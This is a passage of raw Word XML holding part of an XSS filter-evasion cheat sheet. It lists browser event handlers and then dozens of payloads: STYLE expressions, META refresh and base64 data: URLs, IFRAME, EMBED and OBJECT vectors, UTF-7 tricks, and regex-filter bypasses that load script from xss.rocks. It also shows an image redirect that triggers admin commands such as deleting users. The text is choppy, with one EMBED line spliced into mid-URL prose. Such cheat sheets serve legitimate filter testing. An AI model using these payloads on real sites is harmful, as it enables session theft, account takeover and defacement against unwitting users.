          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fires when user navigated the session history)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onProgress()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (attacker would use this as a flash movie was loading)</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onPropertyChange()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user or attacker would need to change an element property)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onReadyStateChange()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user or attacker would need to change an element property)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onRedo()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user went forward in undo transaction history)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onRepeat()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (the event fires once for each repetition of the timeline, excluding the first full cycle)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onReset()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user or attacker resets a form)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onResize()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user would resize the window;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&lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;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onResizeEnd()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user would resize the window;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&lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;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onResizeStart()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user would resize the window;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&lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;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lastRenderedPageBreak/>
        <w:t>onResume()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (the onresume event fires on every element that becomes active when the timeline resumes, including the body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onReverse()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)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onRowsEnter()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user or attacker would need to change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onRowExit()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user or attacker would need to change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onRowDelete()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user or attacker would need to delete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onRowInserted()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user or attacker would need to insert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onScroll()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user would need to scroll, or attacker could use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>scrollBy()</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onSeek()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (the onreverse event fires when the timeline is set to play in any direction other than forward)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onSelect()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user needs to select some text -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window.document.execCommand("SelectAll");</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onSelectionChange()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user needs to select some text -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window.document.execCommand("SelectAll");</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onSelectStart()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user needs to select some text -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window.document.execCommand("SelectAll");</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onStart()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fires at the beginning of each marquee loop)</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onStop()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user would need to press the stop button or leave the webpage)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onStorage()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (storage area changed)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onSyncRestored()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user interrupts the element's ability to play its media as defined by the timeline to fire)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onSubmit()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (requires attacker or user submits a form)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onTimeError()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user or attacker sets a time property, such as dur, to an invalid value)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onTrackChange()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user or attacker changes track in a playList)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onUndo()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user went backward in undo transaction history)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onUnload()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (as the user clicks any link or presses the back button or attacker forces a click)</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onURLFlip()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)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DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>seekSegmentTime()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)</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BGSOUND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&lt;BGSOUND SRC="javascript:alert('XSS');"&gt;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&amp; JavaScript includes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&lt;BR SIZE="&amp;{alert('XSS')}"&gt;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sheet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&lt;LINK REL="stylesheet" HREF="javascript:alert('XSS');"&gt;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(using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page: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&lt;LINK REL="stylesheet" HREF="http://xss.rocks/xss.css"&gt;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 part 2</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works the same as above, but uses a &lt;STYLE&gt; tag instead of a &lt;LINK&gt; tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end &lt;/STYLE&gt; tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world: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&lt;STYLE&gt;@import'http://xss.rocks/xss.css';&lt;/STYLE&gt;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 part 3</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only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: &lt;http://xss.rocks/xss.css&gt;; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:</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HTTP-EQUIV="Link" Content="&lt;http://xss.rocks/xss.css&gt;; REL=stylesheet"&gt;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 part 4</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lastRenderedPageBreak/>
        <w:t>This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites: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&lt;STYLE&gt;BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}&lt;/STYLE&gt;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tags with broken up JavaScript for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XSS at times sends IE into an infinite loop of alerts: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&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert("XSS")';&lt;/STYLE&gt;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attribute using a comment to break up expression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Created by Roman Ivanov</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STYLE="xss:expr/*XSS*/ession(alert('XSS'))"&gt;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IMG STYLE with expression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really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop: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exp/*&lt;A STYLE='no\xss:noxss("*//*");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xss:ex/*XSS*//*/*/pression(alert("XSS"))'&gt;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 (Older versions of Netscape only)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 TYPE="text/javascript"&gt;alert('XSS');&lt;/STYLE&gt;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 using background-image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&lt;STYLE&gt;.XSS{background-image:url("javascript:alert('XSS')");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;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 using background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&lt;STYLE type="text/css"&gt;BODY{background:url("javascript:alert('XSS')")}&lt;/STYLE&gt;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&lt;STYLE type="text/css"&gt;BODY{background:url("javascript:alert('XSS')")}&lt;/STYLE&gt;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Anonymous HTML with STYLE attribute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IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter: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&lt;XSS STYLE="xss:expression(alert('XSS'))"&gt;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Local htc file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a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute: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&lt;XSS STYLE="behavior: url(xss.htc);"&gt;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US-ASCII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US-ASCII encoding (found by Kurt Huwig).This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.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¼script¾alert(¢XSS¢)¼/script¾</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META</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odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs: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CONTENT="0;url=javascript:alert('XSS');"&gt;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META using data</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Directive URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00DC1572">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>RFC 2397</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> for more details or go here or here to encode your own. You can also use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>XSS </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00DC1572">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>calculator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method: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CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&gt;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META with additional URL parameter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the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by Moritz Naumann):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 URL=http://;URL=javascript:alert('XSS');"&gt;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IFRAME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iframes are allowed there are a lot of other XSS problems as well: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SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;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IFRAME Event based</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IFrames and most other elements can use event based mayhem like the following... (Submitted by: David Cross)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 onmouseover="alert(document.cookie)"&gt;&lt;/IFRAME&gt;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FRAME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Frames have the same sorts of XSS problems as iframes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&lt;FRAMESET&gt;&lt;FRAME SRC="javascript:alert('XSS');"&gt;&lt;/FRAMESET&gt;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TABLE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&lt;TABLE BACKGROUND="javascript:alert('XSS')"&gt;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TD</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Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors: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&lt;TABLE&gt;&lt;TD BACKGROUND="javascript:alert('XSS')"&gt;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DIV</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DIV background-image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STYLE="background-image: url(javascript:alert('XSS'))"&gt;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DIV background-image with unicoded XSS exploit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has been modified slightly to obfuscate the url parameter. The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail: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STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"&gt;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DIV background-image plus extra characters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Rnaske built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):</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STYLE="background-image: url(&amp;#1;javascript:alert('XSS'))"&gt;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DIV expression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 variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression":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STYLE="width: expression(alert('XSS'));"&gt;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Downlevel-Hidden block</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Only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:</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 gte IE 4]&gt;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 xml:space="preserve"> &lt;![endif]--&gt;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BASE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Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work):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&lt;BASE HREF="javascript:alert('XSS');//"&gt;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OBJECT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they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your 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&lt;OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"&gt;&lt;/OBJECT&gt;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Using an EMBED tag you can embed a Flash movie that contains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Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: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EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: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org/xss.swf" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;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You can EMBED SVG which can contain your XSS vector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example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.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&lt;EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;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Using ActionScript inside flash can obfuscate your XSS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a="get";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b="URL(\"";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c="javascript:";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d="alert('XSS');\")";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eval(a+b+c+d);</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XML data island with CDATA obfuscation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XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo: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&lt;XML ID="xss"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC="javas&lt;!-- --&gt;cript:alert('XSS')"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;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&lt;SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"&gt;&lt;/SPAN&gt;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Locally hosted XML with embedded JavaScript that is generated using an XML data island</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the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here: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&lt;XML SRC="xsstest.xml" ID=I&gt;&lt;/XML&gt;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&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;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HTML+TIME in XML</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how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work: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&lt;HTML&gt;&lt;BODY&gt;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&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;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&lt;?import namespace="t" implementation="#default#time2"&gt;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&lt;t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;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&lt;/BODY&gt;&lt;/HTML&gt;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Assuming you can only fit in a few characters and it filters against ".js"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you can rename your JavaScript file to an image as an XSS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SRC="http://xss.rocks/xss.jpg"&gt;&lt;/SCRIPT&gt;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SSI (Server Side Includes)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requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues: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&lt;!--#exec cmd="/bin/echo '&lt;SCR'"--&gt;&lt;!--#exec cmd="/bin/echo 'IPT SRC=http://xss.rocks/xss.js&gt;&lt;/SCRIPT&gt;'"--&gt;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PHP</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Requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues: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echo('&lt;SCR)';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echo('IPT&gt;alert("XSS")&lt;/SCRIPT&gt;'); ?&gt;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IMG Embedded commands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works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors: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&lt;IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"&gt;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IMG Embedded commands part II</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more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal &lt;IMG SRC="httx://badguy.com/a.jpg"&gt; could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):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Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser</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Cookie manipulation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Admittedly this is pretty obscure but I have seen a few examples where &lt;META is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...):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HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"&gt;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UTF-7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the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 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&lt;HEAD&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</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XSS using HTML quote encapsulation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lastRenderedPageBreak/>
        <w:t>This was tested in IE, your mileage may vary. For performing XSS on sites that allow "&lt;SCRIPT&gt;" but don't allow "&lt;SCRIPT SRC..." by way of a regex filter "/&lt;script[^&gt;]+src/i":</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SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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For performing XSS on sites that allow "&lt;SCRIPT&gt;" but don't allow "&lt;script src..." by way of a regex filter "/&lt;script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'"&gt;\s]+))?)+\s*|\s*)src/i" (this is an important one, because I've seen this regex in the wild):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="&gt;" SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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Another XSS to evade the same filter, "/&lt;script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'"&gt;\s]+))?)+\s*|\s*)src/i":</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 SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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Yet another XSS to evade the same filter, "/&lt;script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'"&gt;\s]+))?)+\s*|\s*)src/i". I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow &lt;SCRIPT&gt; tags but not remote script is a state machine (and of course there are other ways to get around this if they allow &lt;SCRIPT&gt; tags):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SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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And one last XSS attack to evade, "/&lt;script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'"&gt;\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox):</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SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly: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a="&gt;'&gt;" SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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XSS still worries me, as it would be nearly impossible to stop this without blocking all active content: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&lt;SCRIPT&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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URL 